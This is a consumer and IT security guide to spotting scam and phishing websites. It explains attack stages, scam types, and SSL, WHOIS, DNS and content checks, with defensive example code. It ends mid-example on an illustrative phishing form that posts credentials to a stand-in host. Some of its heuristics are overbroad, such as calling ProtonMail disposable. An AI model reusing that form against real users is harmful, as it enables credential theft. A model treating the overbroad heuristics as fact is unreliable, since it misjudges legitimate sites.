Scam Detector Complete Guide: Phishing Detection, Website Security Analysis & Fraud Prevention


Introduction: The $10 Billion Online Scam Crisis

The “Verify Your Account” Email That Cost $47,000

Monday morning. Sarah, a small business owner, receives an urgent email: “Your PayPal account has been suspended due to suspicious activity. Click here to verify your identity within 24 hours or lose access permanently.”

The email looks perfect—PayPal logo, professional formatting, even a customer service phone number. The urgency triggers panic. She clicks the link.

The website looks identical to PayPal. She enters her email, password, date of birth, social security number (for “verification”), and her bank routing number (to “confirm payment methods”). She even provides her driver’s license photo when prompted.

Within 3 hours:

  • $12,000 withdrawn from her business account
  • $8,500 charged to her credit cards
  • $26,500 loan application submitted in her name
  • Identity theft case opened (cost to resolve: 200+ hours, $47,000 in losses)

The website? Registered 8 days earlier. Hosted in a foreign country. No valid SSL certificate. Shut down 36 hours after the attack.

A simple scam detection check would have revealed the fraud instantly—before she lost everything.

The Devastating Reality of Online Scams (2025)

According to the Federal Trade Commission (FTC), online scam statistics are staggering:

Financial Impact:

  • $10.3 billion lost to scams in 2023 (up from $8.8B in 2022)
  • Average loss per victim: $5,500
  • Most targeted: Adults 60+ ($770M in losses)
  • Fastest growing: Investment scams (cryptocurrency fraud)

Attack Volume:

  • 2.4 million scam reports filed with FTC annually
  • 467,000 phishing websites created monthly (APWG data)
  • 1 in 4 Americans targeted by phishing attempts weekly
  • 97% of phishing sites use domains less than 30 days old

Common Scam Types:

  1. Phishing attacks (fake login pages): 36% of reports
  2. E-commerce fraud (fake online stores): 28%
  3. Investment scams (crypto, stocks): 18%
  4. Romance scams (dating site fraud): 12%
  5. Tech support scams (fake Microsoft/Apple): 6%

Reference: FTC Consumer Sentinel Report 2023

Who Needs Scam Detection Tools?

This comprehensive guide is critical for:

  • Online Shoppers: Verify e-commerce sites before entering payment information
  • Business Owners: Protect company credentials from phishing attacks
  • Elderly Users: Defend against targeted scams (tech support, healthcare fraud)
  • IT Security Teams: Add automated scanning to security workflows
  • Financial Institutions: Protect customers from fake banking sites
  • Parents: Check websites kids visit for safety
  • Investors: Verify investment platforms before depositing funds
  • Job Seekers: Identify fake job postings and recruitment scams

Use our Scam Detector to analyze any website instantly with 7-point security checks before entering personal information.

Quick Answer: How to Spot Scam Websites

Before we dive into 13,000 words of technical details, here’s what you need immediately:

Instant Red Flags (Close Website Immediately):

  • No HTTPS lock icon (or “Not Secure” warning)
  • Misspelled domain (paypa1.com instead of paypal.com)
  • Urgent threats (“Account suspended!”, “Verify now or lose access!”)
  • Too-good-to-be-true (iPhone 15 for $99, guaranteed investment returns)
  • Poor grammar/spelling in official-looking emails
  • Requests for unusual info (SSN, passwords via email)
  • Payment only via wire/crypto (no credit card option)

Quick Safety Checks:

  1. HTTPS: Look for padlock icon in address bar
  2. Domain spelling: Verify exact company name (google.com not g00gle.com)
  3. Domain age: Use WHOIS Lookup (scams = new domains)
  4. Contact info: Search for legitimate address, phone number
  5. Reviews: Google “[company name] scam” to see warnings

7-Point Security Analysis:

  1. SSL/TLS Certificate Validation
  2. Domain Age & WHOIS Data
  3. DNS Configuration Health
  4. Content Safety & Phishing Patterns
  5. TLD (Domain Extension) Risk
  6. HTTP Redirect Chain Analysis
  7. Contact Information Verification

Risk Scores:

  • 0-19: Low risk (safe to proceed)
  • 20-44: Medium risk (verify independently)
  • 45-69: High risk (avoid entering personal info)
  • 70-100: Critical risk (close immediately, report)

Test Now: 👉 Analyze Website Safety


Understanding Scam Detection: Technical Deep Dive

What is Scam Detection? (The Science)

Definition:
Scam detection (also called phishing detection, fraud detection, or website security analysis) is the automated process of analyzing multiple security indicators to identify malicious websites designed to steal personal information, financial data, or distribute malware.

How It Works:
Our scam detector uses a multi-factor risk assessment algorithm combining:

  • Technical indicators: SSL certificates, DNS configuration, server infrastructure
  • Behavioral signals: Domain age, redirect patterns, hosting location
  • Content analysis: Phishing keywords, form structures, JavaScript obfuscation
  • Reputation data: Blacklists, known attack patterns, TLD abuse statistics

Standards and Frameworks:

  • APWG (Anti-Phishing Working Group): Industry standards for phishing detection
  • X.509 Certificates: RFC 5280 SSL/TLS validation
  • WHOIS Protocol: RFC 3912 domain registration data
  • DNS Security: RFC 4034 DNSSEC validation
  • Content Security: W3C standards for safe web practices

Why Automated Detection Matters:

Human limitations:

  • Can’t verify SSL certificate chains manually
  • Difficult to check domain registration dates
  • No easy way to analyze DNS infrastructure
  • Time-consuming to research website reputation

Automated advantages:

  • Instant analysis (5-30 seconds)
  • Multi-factor assessment (7+ indicators)
  • Objective scoring (no human bias)
  • Historical data comparison (known attack patterns)
  • Real-time threat intelligence

Reference: Anti-Phishing Working Group (APWG)

The Anatomy of a Phishing Attack

Typical Attack Flow:

Stage 1: Reconnaissance (Attacker Preparation)

1. Attacker selects target (PayPal, bank, popular service)
2. Registers similar domain:
   - Typosquatting: paypa1.com (1 instead of l)
   - Subdomain abuse: paypal.security-check.com
   - Homograph attack: рaypal.com (Cyrillic 'р' looks like 'p')
3. Sets up hosting (cheap VPS, bullet-proof hosting)
4. Clones target website (copies HTML, CSS, images)
5. Deploys fake login form (harvests credentials)

Stage 2: Delivery (Reaching Victims)

6. Sends phishing emails:
   - Spoofed sender: security@paypal.com
   - Urgent subject: "Account Suspended - Action Required"
   - Malicious link: paypa1.com/verify
7. Alternative delivery:
   - SMS phishing (smishing)
   - Social media messages
   - Malicious ads
   - QR codes

Stage 3: Exploitation (Credential Theft)

8. Victim clicks link, lands on fake site
9. Enters credentials:
   - Email/username
   - Password
   - 2FA codes (in real-time phishing)
   - Additional info (SSN, DOB, address)
10. Attacker harvests data instantly
11. Often redirects to real site (victim unaware)

Stage 4: Abuse (Identity Theft)

12. Attacker uses stolen credentials:
    - Drains bank accounts
    - Makes fraudulent purchases
    - Opens credit accounts
    - Sells credentials on dark web
13. Shuts down phishing site (within 24-48 hours)
14. Victim discovers fraud days/weeks later

Our Detection Points:

Attack Stage          Detection Method                   Tool Check
─────────────────────────────────────────────────────────────────────
Domain Registration → WHOIS age check                  → Domain Age
SSL Setup          → Certificate validation           → SSL Checker
Hosting Setup      → DNS infrastructure analysis      → DNS Lookup
Website Clone      → Content pattern matching         → Phishing Scan
Delivery           → Link reputation check            → URL Analysis

Common Scam Types (Taxonomy)

1. Credential Phishing

Definition: Fake login pages mimicking legitimate services

Examples:

  • Fake banking login (Chase, Bank of America, Wells Fargo)
  • Email provider spoofs (Gmail, Outlook, Yahoo)
  • Social media clones (Facebook, Instagram, LinkedIn)
  • E-commerce impersonation (Amazon, eBay, PayPal)

Characteristics:

  • Domain: Similar to legitimate (paypa1.com)
  • Design: Pixel-perfect copy of real login page
  • Request: Email + password + 2FA
  • Redirect: Often forwards to real site after theft

Detection:

  • Domain age: Usually <30 days
  • SSL: Self-signed or free certificate (not EV)
  • URL: Slight misspelling
  • Form action: Posts to external domain

Real Example:

Legitimate: https://www.paypal.com/signin
Phishing:   https://paypa1-secure.com/signin
                    │    ││└── "secure" added to look official
                    │    │└─── Hyphen added
                    │    └──── Number 1 instead of letter l
                    └───────── Different domain (not www.paypal.com)
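The three look-alike tricks listed under Stage 1 (typosquatting, subdomain abuse, homograph attack) as a small Python check, added here as an example; it is not the Scam Detector's own code, and the brand list and digit-to-letter map are assumptions for the example.

```python
import unicodedata

# Constructed brand list and look-alike map for the example (not the tool's data)
BRANDS = ["paypal", "amazon", "apple", "microsoft", "google"]
CONFUSABLE_DIGITS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s"})


def has_mixed_script(label):
    """True when one label mixes letters from different scripts, e.g. a
    Cyrillic 'р' (U+0440) in front of Latin 'aypal': the homograph trick."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "?").split(" ")[0])  # 'LATIN', 'CYRILLIC', ...
    return len(scripts) > 1


def check_lookalike(host, brands=BRANDS):
    """Return a list of reasons why `host` may be impersonating a known brand.
    An empty list means none of the checks fired (not a proof of legitimacy)."""
    findings = []
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return findings
    name = labels[-2]            # registrable label: 'paypa1-secure' in paypa1-secure.com
    subdomains = labels[:-2]     # everything left of the registrable domain

    # 1. Homograph / IDN: anything non-ASCII, or a label mixing scripts
    for label in labels:
        if not label.isascii():
            try:
                punycode = label.encode("idna").decode("ascii")
            except UnicodeError:
                punycode = "<unencodable>"
            findings.append(f"non-ASCII label {label!r} (punycode {punycode})")
        if has_mixed_script(label):
            findings.append(f"mixed-script label {label!r} (homograph attack)")

    # 2. Typosquatting: fold digit look-alikes (1->l, 0->o) before comparing
    folded = unicodedata.normalize("NFKC", name).translate(CONFUSABLE_DIGITS)
    stripped = folded.replace("-", "")
    for brand in brands:
        if name == brand:        # the brand's own registrable domain
            continue
        if brand in stripped:    # heuristic: 'pineapple' would also match 'apple'
            if folded != name:
                findings.append(f"digit/letter substitution: {name!r} folds to {folded!r} (~ {brand})")
            if stripped != brand:
                findings.append(f"brand '{brand}' padded with extra words in {name!r}")
        # 3. Subdomain abuse: the brand only appears left of someone else's domain
        if brand in subdomains:
            findings.append(f"'{brand}' is a subdomain of unrelated domain {'.'.join(labels[-2:])!r}")
    return findings
```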

2. E-Commerce Scams

Definition: Fake online stores that take payment but never deliver

Examples:

  • Luxury goods at impossible prices (Rolex for $50)
  • Limited-time offers (iPhone 15 Pro: 90% off!)
  • Sold-out items mysteriously available
  • “Clearance” sales on brand-new products

Characteristics:

  • Pricing: 70-95% below market value
  • Payment: Wire transfer, cryptocurrency, gift cards only
  • Contact: Generic email (support@, info@)
  • Reviews: Fake or nonexistent

Detection:

  • Domain age: Brand new (0-14 days)
  • WHOIS: Privacy protection enabled
  • Contact info: No physical address, phone goes to voicemail
  • Social media: No presence or fake followers
  • Payment: No credit card option (only irreversible methods)

Verification Steps:

# Check domain age
whois example-shop.com | grep "Creation Date"
# Scam if: Created in last 30 days

# Check business registration
Search: "[Company Name] BBB" (Better Business Bureau)
Search: "[Company Name] business license [state]"
# Scam if: No registration found

# Check reviews
Search: "[Company Name] scam"
Check: Trustpilot, BBB, Reddit
# Scam if: Multiple scam reports

3. Investment Scams

Definition: Fake investment platforms promising guaranteed returns

Examples:

  • Cryptocurrency trading platforms (fake exchanges)
  • High-yield investment programs (HYIPs)
  • Ponzi schemes (Bernie Madoff-style)
  • Forex trading scams
  • “Get rich quick” schemes

Characteristics:

  • Returns: Guaranteed 10-50% monthly (impossible)
  • Testimonials: Fake success stories with stock photos
  • Urgency: “Limited spots available”
  • Minimum: Low entry barrier ($100-$500)
  • Withdrawal: Delays, excuses, eventually impossible

Detection:

  • Domain age: Very recent registration
  • SEC registration: Not registered with authorities
  • Physical location: Offshore or non-existent
  • Contact: Only through website form
  • Promises: Violate basic investment principles

Red Flags:

"Guaranteed returns"        → Impossible (no investment is guaranteed)
"No risk"                   → False (all investments have risk)
"Secret algorithm"          → Deceptive (legitimate firms explain strategies)
"Limited time offer"        → Pressure tactic
"Withdrawal fees required"  → Advance fee fraud

4. Tech Support Scams

Definition: Fake technical support claiming your computer is infected

Examples:

  • Microsoft/Windows Defender alerts
  • Apple/Mac security warnings
  • Antivirus renewal scams (Norton, McAfee)
  • Browser “virus detected” pop-ups

Characteristics:

  • Pop-ups: Flashing warnings, fake virus scans
  • Audio: Computer voice saying “Your computer is infected”
  • Lock: Browser locked with fullscreen message
  • Phone: Toll-free number to call “support”
  • Request: Remote access via TeamViewer, AnyDesk

Detection:

  • Domain: Not official Microsoft/Apple domain
  • Pop-up: Uses JavaScript to lock browser
  • Number: Not listed on official support pages
  • Scare tactics: Threats of data loss, legal action

Self-Defense:

1. Close browser (Ctrl+Alt+Delete → Task Manager → End Task)
2. Run real antivirus scan (Windows Defender, Malwarebytes)
3. Never call numbers from pop-ups
4. Never grant remote access to unknown parties
5. Report: https://reportfraud.ftc.gov/

5. Romance Scams

Definition: Fake romantic interest to extract money

Examples:

  • Dating site profiles (Tinder, Match, eHarmony)
  • Social media friend requests (Facebook, Instagram)
  • Email correspondence (lonely hearts scams)

Characteristics:

  • Profile: Attractive photos (often stolen from models)
  • Story: Military deployment, working abroad, widowed
  • Progression: Rapid emotional attachment (“I love you”)
  • Crisis: Sudden emergency (medical, travel, customs)
  • Request: Money via wire transfer or gift cards

Detection:

  • Photos: Reverse image search (stolen from internet)
  • Story: Consistent excuses to avoid video chat
  • Location: Claims to be local but can’t meet
  • Grammar: Poor English despite claiming to be American
  • Money: Always needs funds, never repays

Verification:

# Reverse image search
1. Save profile photo
2. Upload to Google Images (images.google.com)
3. Check if photo appears on multiple profiles
   → Scam if: Same photo with different names

# Video chat test
Request live video call
→ Scam if: Always has excuses (broken camera, shy, etc.)

# Story verification
Google specific details (unit number, hospital name)
→ Scam if: Details don't match reality

Reference: FBI Romance Scam Warning


The 7-Point Security Analysis System

1. SSL/TLS Certificate Validation

What We Check:

Certificate Authority (CA) Trust:

  • Is certificate issued by recognized CA?
    • ✅ Trusted: Let’s Encrypt, DigiCert, Sectigo, GlobalSign
    • ❌ Untrusted: Self-signed, unknown CA
  • Is CA in browser trust store?

Certificate Validity:

Check expiration:
  Not before: 2024-01-01 00:00:00 UTC  ← Valid start
  Not after:  2025-01-01 00:00:00 UTC  ← Check current date

  ✅ Valid if: Current date within range
  ❌ Invalid if: Expired or not yet valid

Hostname Verification:

Certificate issued for: www.example.com
Visiting:               www.example.com
✅ Match

Certificate issued for: legitimate-bank.com
Visiting:               1egitimate-bank.com (number 1, not letter l)
❌ Mismatch → Phishing attempt

Certificate Type:

Domain Validation (DV):
  - Verifies domain control only
  - Free (Let's Encrypt)
  - Issue time: Minutes
  → Used by 95% of sites (both legit and scam)

Extended Validation (EV):
  - Verifies legal business entity
  - Cost: $100-500/year
  - Issue time: Days (manual verification)
  → Rarely used by scammers (expensive, requires documentation)
  → Green bar in some browsers

Certificate Chain:

Complete chain:
  End-entity (server.crt) ← Your website
       ↓
  Intermediate (intermediate.crt) ← CA's intermediate
       ↓
  Root (root.crt) ← CA's root (in browser)

✅ Valid: All certificates present and valid
❌ Invalid: Broken chain (site won't load properly)

Check Your SSL: SSL Certificate Checker

Scam Indicators:

Indicator    Legitimate Site             Scam Site
────────────────────────────────────────────────────────────
HTTPS        ✅ Yes (padlock icon)        ❌ No (or self-signed)
CA           DigiCert, Let’s Encrypt     Unknown, self-signed
Hostname     Exact match                 Slight misspelling
Age          Years old                   Days/weeks old
Type         EV for banks                DV or none

Manual Verification:

Google Chrome:

1. Click padlock icon → Connection is secure
2. Click "Certificate is valid"
3. Check:
   - Issued to: www.paypal.com (exact match)
   - Issued by: DigiCert SHA2 High Assurance Server CA
   - Valid from: [past date] to [future date]
   - Status: ✓ This certificate is valid

Firefox:

1. Click padlock icon → Connection secure → More Information
2. View Certificate
3. Verify:
   - Subject: CN=www.paypal.com
   - Issuer: DigiCert Inc
   - Validity: Not Before / Not After dates

Command Line:

# Check SSL certificate
openssl s_client -connect example.com:443 -servername example.com </dev/null 2>/dev/null | openssl x509 -noout -text

# Extract specific fields
echo | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -subject -issuer -dates

# Output:
subject=CN = www.paypal.com
issuer=C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1
notBefore=Nov 25 00:00:00 2023 GMT
notAfter=Dec 24 23:59:59 2024 GMT
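The certificate checks from this section (hostname match, validity window, self-signed detection) run over the `openssl x509 -noout -subject -issuer -dates` output shape shown above. This is an added example, not the Scam Detector's code; the sample output is constructed, not captured from a live connection.

```python
from datetime import datetime, timezone

# Constructed sample in the shape of: openssl x509 -noout -subject -issuer -dates
SAMPLE_OPENSSL_OUTPUT = """\
subject=CN = www.paypal.com
issuer=C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1
notBefore=Nov 25 00:00:00 2023 GMT
notAfter=Dec 24 23:59:59 2024 GMT
"""

OPENSSL_DATE_FORMAT = "%b %d %H:%M:%S %Y %Z"   # e.g. "Nov 25 00:00:00 2023 GMT"


def parse_openssl_output(text):
    """Split 'key=value' lines into a dict; names become nested dicts, dates datetimes."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key in ("subject", "issuer"):
            # "C = US, O = DigiCert Inc, CN = ..." -> {"C": "US", "O": "DigiCert Inc", ...}
            value = {k.strip(): v.strip()
                     for k, _, v in (part.partition("=") for part in value.split(","))}
        elif key in ("notBefore", "notAfter"):
            value = datetime.strptime(value, OPENSSL_DATE_FORMAT).replace(tzinfo=timezone.utc)
        fields[key] = value
    return fields


def hostname_matches(cert_name, host):
    """RFC 6125-style match: exact, or a '*.' wildcard covering exactly one label."""
    cert_name, host = cert_name.lower().rstrip("."), host.lower().rstrip(".")
    if cert_name == host:
        return True
    if cert_name.startswith("*."):
        return host.endswith(cert_name[1:]) and host.count(".") == cert_name.count(".")
    return False


def assess_certificate(openssl_text, visited_host, now=None):
    """Return (problems, summary) for the certificate described by openssl_text.
    Only the subject CN is checked here; production code must also check the
    subjectAltName extension, which browsers use instead of the CN."""
    now = now or datetime.now(timezone.utc)
    cert = parse_openssl_output(openssl_text)
    problems = []
    cn = cert["subject"].get("CN", "")
    if not hostname_matches(cn, visited_host):
        problems.append(f"hostname mismatch: certificate is for {cn!r}, visiting {visited_host!r}")
    if now < cert["notBefore"]:
        problems.append(f"not yet valid (starts {cert['notBefore']:%Y-%m-%d})")
    if now > cert["notAfter"]:
        problems.append(f"expired on {cert['notAfter']:%Y-%m-%d}")
    if cert["subject"] == cert["issuer"]:
        problems.append("self-signed certificate (subject equals issuer)")
    summary = {
        "cn": cn,
        "issuer_org": cert["issuer"].get("O", "unknown"),
        "valid_now": cert["notBefore"] <= now <= cert["notAfter"],
    }
    return problems, summary
```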

Why Scammers Use HTTPS:

Common Misconception:

“HTTPS = Safe website” ❌ WRONG

Reality:

  • HTTPS encrypts connection (prevents eavesdropping)
  • Does NOT verify website legitimacy
  • Let’s Encrypt gives free certificates to anyone (including scammers)
  • 80% of phishing sites now use HTTPS

What HTTPS Actually Means:

  • ✅ Data is encrypted between you and the server
  • ✅ The server has an SSL certificate

What HTTPS Does NOT Mean:

  • ❌ The server is trustworthy
  • ❌ The website is legitimate
  • ❌ It is safe to enter personal information

Always check additional indicators beyond HTTPS!

2. Domain Age & WHOIS Analysis

Why Domain Age Matters:

Scammer Economics:

  • Domain cost: $10-15/year
  • Expected lifespan: 24-72 hours (before shutdown)
  • ROI threshold: 1-2 victims
  • Optimal strategy: Use disposable domains

Statistics:

  • 97% of phishing sites use domains <30 days old
  • 85% are <14 days old
  • 60% are <7 days old
  • Average lifespan: 48 hours before takedown

Age-Risk Correlation:

Domain Age           Risk Level    Typical Use Case
───────────────────────────────────────────────────────────────
0-7 days             CRITICAL      Fresh phishing attack
8-30 days            HIGH          Scam site, test site
31-90 days           MEDIUM        New business (verify independently)
91-365 days          LOW           Established presence
1-5 years            VERY LOW      Legitimate business
5+ years             TRUSTED       Long-standing reputation

WHOIS Lookup Process:

What is WHOIS?

  • Internet database of domain registrations
  • Protocol: RFC 3912
  • Managed by: ICANN (Internet Corporation for Assigned Names and Numbers)
  • Data: Registrant, registrar, dates, nameservers

Command Line WHOIS:

whois example.com

# Key fields to check:
Domain Name: EXAMPLE.COM
Registrar: GoDaddy, Namecheap, etc.
Creation Date: 1995-08-14T04:00:00Z  ← Registration date
Expiry Date: 2025-08-13T04:00:00Z    ← When it expires
Updated Date: 2024-07-01T10:15:30Z   ← Last modification

Registrant:
  Organization: Example Inc.
  State: California
  Country: US
  Email: admin@example.com

Name Server: ns1.example.com
Name Server: ns2.example.com

Red Flags in WHOIS:

1. Privacy Protection:

Legitimate:
  Registrant: PayPal Inc.
  Address: 2211 North First Street, San Jose, CA 95131
  Email: domains@paypal.com

Scam:
  Registrant: REDACTED FOR PRIVACY  ← Hidden identity
  Address: REDACTED FOR PRIVACY
  Email: REDACTED FOR PRIVACY

  → Not illegal, but scammers use this to hide

2. Offshore Registrars:

High-Risk Registrars (abuse-friendly):
  - Registrars in countries with weak enforcement
  - "Bullet-proof" hosting providers
  - Privacy-focused registrars popular with scammers

Check: whois example.com | grep "Registrar:"
Red flag if: Unknown or offshore registrar

3. Recent Updates:

Creation Date: 2024-11-25  ← Domain created 5 days ago
Updated Date:  2024-11-25  ← No changes since creation

Red flags:
  - Domain age less than 30 days
  - Registrant info updated recently (ownership change)
  - Expiration date only 1 year out (scammers don't renew long-term)

4. Disposable Email:

Registrant Email: temp123@protonmail.com  ← Disposable email
Registrant Email: admin@yopmail.com       ← Temp email service

Legitimate:
Registrant Email: legal@company.com       ← Corporate email
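The WHOIS red flags above (domain age mapped to the Age-Risk table, privacy-redacted registrant, one-year registration, recent ownership change) as a Python parser over the `Key: Value` output shape shown in this section. This is an added example, not the Scam Detector's code; both WHOIS records are constructed samples, not live lookups.

```python
import re
from datetime import date

# Constructed WHOIS records in the shape shown above (not live lookups)
SAMPLE_WHOIS_SCAM = """\
Domain Name: PAYPA1-SECURE.COM
Registrar: Namecheap Inc.
Creation Date: 2024-11-20T00:00:00Z
Registry Expiry Date: 2025-11-20T00:00:00Z
Updated Date: 2024-11-20T00:00:00Z
Registrant Organization: REDACTED FOR PRIVACY
Registrant Country: PA
Registrant Email: REDACTED FOR PRIVACY
Name Server: ns1.cheapdns.com
"""

SAMPLE_WHOIS_LEGIT = """\
Domain Name: PAYPAL.COM
Registrar: MarkMonitor Inc.
Creation Date: 1999-03-04T05:00:00Z
Registry Expiry Date: 2028-03-04T05:00:00Z
Updated Date: 2024-07-01T10:15:30Z
Registrant Organization: PayPal Inc.
Registrant Country: US
Registrant Email: domains@paypal.com
Name Server: ns1.p57.dynect.net
Name Server: ns2.p57.dynect.net
"""

# Registrars label the same fields differently; accept the common spellings
CREATION_KEYS = ("creation date", "created on", "created", "registration date")
EXPIRY_KEYS = ("registry expiry date", "expiry date", "expiration date", "expires on")
UPDATED_KEYS = ("updated date", "last updated", "last modified")


def parse_whois(text):
    """Return {lowercased key: [values...]} for every 'Key: Value' line."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and value.strip():
            fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def first_date(fields, keys):
    """First value under any of `keys` that starts with YYYY-MM-DD, as a date."""
    for key in keys:
        for value in fields.get(key, []):
            m = re.match(r"(\d{4})-(\d{2})-(\d{2})", value)
            if m:
                return date(*map(int, m.groups()))
    return None


def age_risk(age_days):
    """Map domain age in days to the Age-Risk table used in this section."""
    for limit, level in ((7, "CRITICAL"), (30, "HIGH"), (90, "MEDIUM"),
                         (365, "LOW"), (5 * 365, "VERY LOW")):
        if age_days <= limit:
            return level
    return "TRUSTED"


def assess_whois(text, today):
    """Return age, risk level and the red flags found in one WHOIS record."""
    fields = parse_whois(text)
    created = first_date(fields, CREATION_KEYS)
    if created is None:
        return {"age_days": None, "risk": "UNKNOWN", "flags": ["no creation date found"]}
    expires = first_date(fields, EXPIRY_KEYS)
    updated = first_date(fields, UPDATED_KEYS)
    age = (today - created).days
    flags = []
    if age < 30:
        flags.append(f"domain is only {age} days old")
    if expires and (expires - created).days <= 366:
        flags.append("registered for a single year only")
    if updated and updated != created and (today - updated).days < 30:
        flags.append("registrant data changed in the last 30 days")
    if any("REDACTED" in v.upper() or "PRIVACY" in v.upper()
           for values in fields.values() for v in values):
        flags.append("registrant identity hidden behind privacy protection")
    return {"age_days": age, "risk": age_risk(age), "flags": flags,
            "registrar": fields.get("registrar", ["unknown"])[0]}
```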

Use Our Tool: Domain Age Checker

Case Study: PayPal Phishing

Legitimate PayPal:

whois paypal.com

Domain Name: PAYPAL.COM
Registrar: MarkMonitor Inc.
Creation Date: 1999-03-04  ← 25 years old
Registrant: PayPal Inc.
Address: 2211 North First Street, San Jose, CA 95131
Country: US
Name Servers: ns1.p57.dynect.net, ns2.p57.dynect.net

Phishing Site:

whois paypa1-secure.com

Domain Name: PAYPA1-SECURE.COM
Registrar: Namecheap Inc.
Creation Date: 2024-11-20  ← 10 days old ❌
Registrant: REDACTED FOR PRIVACY  ← Hidden ❌
Address: REDACTED FOR PRIVACY
Country: PA  ← Panama (offshore) ❌
Name Servers: ns1.cheapdns.com  ← Free DNS ❌

Instant Verdict: SCAM

3. DNS Configuration Health

What is DNS Analysis?

DNS (Domain Name System):

  • Translates domain names to IP addresses
  • Example: example.com → 93.184.216.34
  • Multiple record types: A, AAAA, MX, NS, TXT, etc.
  • Managed by authoritative nameservers

Why DNS Matters for Scam Detection:

  • Legitimate sites have robust DNS infrastructure
  • Scammers use cheap, minimal DNS setups
  • DNS patterns reveal hosting quality
  • Fast DNS = professional setup, slow = amateur

DNS Records Analyzed:

A Record (IPv4 Address):

dig A example.com +short
93.184.216.34

Check:
  ✅ IP resolves quickly (<100ms)
  ✅ IP belongs to reputable hosting (AWS, Google, Cloudflare)
  ❌ IP in known malicious ranges
  ❌ IP changes frequently (fast-flux DNS)

Nameserver Records (NS):

dig NS example.com +short
ns1.example.com
ns2.example.com

Legitimate sites:
  - 2+ nameservers (redundancy)
  - Reputable providers:
    • Cloudflare: ns1.cloudflare.com
    • AWS Route53: ns-1234.awsdns-56.com
    • Google Cloud DNS: ns-cloud-a1.googledomains.com

Scam sites:
  - Single nameserver (no redundancy) ❌
  - Free DNS services (freeDNS, No-IP) ❌
  - Unknown/sketchy providers ❌

MX Records (Email):

dig MX example.com +short
10 mail.example.com

Legitimate:
  - Valid MX records present
  - Professional email provider:
    • Google Workspace: aspmx.l.google.com
    • Microsoft 365: example-com.mail.protection.outlook.com
    • Proofpoint, Mimecast (enterprise email security)

Scam:
  - No MX records ❌ (can't receive email)
  - Generic/free email ❌ (mail.cheaphost.com)

TXT Records (Domain Verification):

dig TXT example.com +short

Look for:
  ✅ SPF record: "v=spf1 include:_spf.google.com ~all"
  ✅ DKIM records: Email authentication
  ✅ DMARC: "v=DMARC1; p=reject;"
  ✅ Domain verification: "google-site-verification=..."

Absence of these records suggests:
  - No email sending (scam site)
  - No domain verification (not claimed by business)

DNS Response Time:

# Measure DNS query time
dig example.com | grep "Query time"
;; Query time: 23 msec  ← Fast (good sign)

Fast DNS (<100ms):
  ✅ Professional DNS hosting
  ✅ Geographically distributed nameservers
  ✅ High-quality infrastructure

Slow DNS (>500ms):
  ❌ Cheap shared hosting
  ❌ Overloaded DNS servers
  ❌ Amateur setup

Use Our Tool: DNS Lookup Tool

Hosting Provider Analysis:

IP Geolocation:

# Get IP address
dig example.com +short
93.184.216.34

# Lookup IP owner (WHOIS)
whois 93.184.216.34 | grep "OrgName"
OrgName: Edgecast Inc.  ← Legitimate CDN

Legitimate hosting:
  ✅ Amazon AWS
  ✅ Google Cloud
  ✅ Microsoft Azure
  ✅ Cloudflare
  ✅ DigitalOcean
  ✅ Known reputable providers

Suspicious hosting:
  ❌ Offshore providers (Russia, China for US-targeted scams)
  ❌ "Bullet-proof" hosts (ignore abuse reports)
  ❌ Residential IPs (compromised home routers)
  ❌ Frequently changing IPs (fast-flux)

Reverse DNS (PTR Record):

# Check reverse DNS
dig -x 93.184.216.34 +short
example.com.  ← Matches forward lookup ✅

Legitimate:
  Forward:  example.com → 93.184.216.34
  Reverse:  93.184.216.34 → example.com
  ✅ Match confirms ownership

Scam:
  Forward:  scam-site.com → 123.45.67.89
  Reverse:  123.45.67.89 → shared-hosting-123.cheaphost.com
  ❌ Mismatch indicates shared/temporary hosting

DNS Propagation:

# Check DNS consistency across multiple resolvers
dig @8.8.8.8 example.com +short          # Google DNS
dig @1.1.1.1 example.com +short          # Cloudflare DNS
dig @208.67.222.222 example.com +short   # OpenDNS

✅ Same result = Stable DNS
❌ Different results = DNS manipulation or propagation issues

Real-World Example:

Legitimate (Amazon.com):

$ dig amazon.com +short
205.251.242.103
176.32.103.205
176.32.98.166
# Multiple IPs (load balancing)

$ dig NS amazon.com +short
ns1.p31.dynect.net.
ns2.p31.dynect.net.
ns3.p31.dynect.net.
ns4.p31.dynect.net.
# 4 nameservers (redundancy)

$ dig MX amazon.com +short
10 amazon-smtp.amazon.com.
# Enterprise email infrastructure

Scam (Fake Amazon):

$ dig amaz0n-deals.com +short
45.123.45.67
# Single IP (no redundancy) ❌

$ dig NS amaz0n-deals.com +short
ns1.freehosting.com
# Free DNS service ❌

$ dig MX amaz0n-deals.com +short
# No MX records ❌ (can't receive email)

Verdict: Scam site with amateur infrastructure

4. Content Safety & Phishing Pattern Scan

HTML/JavaScript Analysis:

Phishing Keywords Detection:

Urgency Keywords:

<!-- Scam site HTML -->
<h1>URGENT: Your account will be suspended!</h1>
<p>Verify your identity within 24 hours or lose access permanently</p>

Keywords triggering alerts:
  - "urgent", "immediately", "within 24 hours"
  - "suspended", "locked", "frozen"
  - "verify", "confirm", "update"
  - "unusual activity", "suspicious login"
  - "click here now", "act fast"

Scarcity Tactics:

<!-- Fake sale -->
<h2>ONLY 3 LEFT IN STOCK!</h2>
<p>Sale ends in: <span id="countdown">00:05:27</span></p>

Patterns:
  - Fake countdown timers (JavaScript)
  - "Limited time offer" (resets when page reloads)
  - "Only X remaining" (always shows same number)

Authority Impersonation:

<!-- Impersonating official entity -->
<title>Internal Revenue Service - Tax Refund</title>
<img src="irs-logo.png" alt="IRS Official Seal">

Red flags:
  - Government agency impersonation
  - Law enforcement threats
  - Financial institution clones
  - Tech company spoofs (Microsoft, Apple)

Form Analysis:

Credential Harvesting Forms:

<!-- Legitimate login form (PayPal) -->
<form action="https://www.paypal.com/signin" method="POST">
  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <button type="submit">Log In</button>
</form>
<!-- ✅ Form action goes to same domain -->

<!-- Phishing form -->
<form action="https://evil-server.com/steal.php" method="POST">
